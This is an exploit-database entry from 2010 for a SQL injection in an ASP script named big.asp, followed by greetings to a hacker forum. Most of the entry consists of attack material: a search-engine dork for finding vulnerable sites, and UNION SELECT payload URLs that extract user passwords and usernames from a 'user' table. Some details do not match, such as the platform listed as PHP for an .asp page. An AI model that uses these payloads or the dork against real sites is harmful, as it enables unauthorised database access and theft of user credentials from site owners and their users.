big.asp - SQL Injection

EDB-ID:

12533

CVE:

N/A


Author:

Ra3cH

Type:

webapps


Platform:

PHP

Date:

2010-05-08


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

*******************************************************************************
# Author   : Ra3cH
# Price    : N/A
# Title    : (big.asp) SQL Injection Vulnerability
# Site     : www.dz4all.com/cc
# Dork     : inurl:enq/big.asp?id=
# Risk     : High
*
**Vulnerable script: enq/big.asp?id= (SQL-injection)
*
---------------------------------------------------------
*
*
**http://server/[path]/enq/big.asp?id=  [SQL Inject]
*
*
**Exploit:
*
*
**-999.9 UNION ALL SELECT null,null,null,null,null,null,null,null,null,null,null,null from user where 1=1
*
*
**Exemple:
*
*
**http://[site]/enq/big.asp?id=-999.9 UNION ALL SELECT null,null,user_pass,null,null,null,null,null,null,null,null from user where 1=1
*
**or
*
*
**http://[site]/enq/big.asp?id=-999.9 UNION ALL SELECT null,null,null,null,user_name,null,null,null,null,null,null,null from user where 1=1
*
**Admin Login->
*
*
**http://server/[path]/Use your intelligence
*
*""""""""""""""""""""
** Greetz to :     ALLAH
**         All Members of  http://www.DZ4All.cOm/Cc
**          And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n &